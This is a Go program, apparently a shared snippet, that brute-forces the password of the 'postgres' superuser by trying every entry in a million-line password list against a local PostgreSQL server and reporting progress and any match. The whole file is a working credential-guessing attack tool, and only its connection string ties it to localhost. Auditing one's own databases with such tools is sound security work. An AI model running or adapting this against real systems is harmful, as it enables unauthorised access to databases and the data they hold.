Brute force password guesser for Postgres

postgres-brute-force.go

package main

import (
	"bufio"
	"fmt"
	"log"
	"net/url"
	"os"
	"time"
	"database/sql"
	_ "github.com/lib/pq"
)

var connStr string = "postgresql://postgres:%s@localhost:5432/postgres?sslmode=disable"
var pwFile string = "top-1m-pw.txt"

func getPostgresDBConnection(libPqConnString string) (*sql.DB, error) {
	var err error
	var db *sql.DB

	db, err = sql.Open("postgres", libPqConnString)
	if err != nil {
		return nil, err
	}
	return db, err
}

func main() {
	var curTime time.Time
	start_time := time.Now()
	lastProgressMsg := start_time
	attempts := 0
	var pwd string
	var t *url.URL

	f, err := os.OpenFile(pwFile, os.O_RDONLY, os.ModePerm)
	if err != nil {
		log.Fatalf("open file error: %v", err)
	}
	rd := bufio.NewReader(f)

	for {
		pwd, err = rd.ReadString('\n')
		if pwd == "" || err != nil {
			log.Fatalf("exiting. pwd: %s, err: %v", pwd, err)
		}
		t = &url.URL{Path: string(pwd[:len(pwd)-1])}  // password can include funny chars which need escaping
		conn, err := getPostgresDBConnection(fmt.Sprintf(connStr, t.String()))

		if err != nil {
			log.Fatal("failed to initialize conn", err)
		}

		err = conn.Ping()
		attempts++

		curTime = time.Now()
		if err != nil {
			// quite expected...
		} else {
			fmt.Println("password MATCH:", pwd)
			fmt.Println("attempts:", attempts)
			fmt.Println("runtime:", curTime.Sub(start_time))
			return
		}
		if lastProgressMsg.Before(curTime.Add(time.Second * -10)) {
			fmt.Println("attempts:", attempts)
			fmt.Println("runtime:", curTime.Sub(start_time))
			lastProgressMsg = curTime
		}
	}

}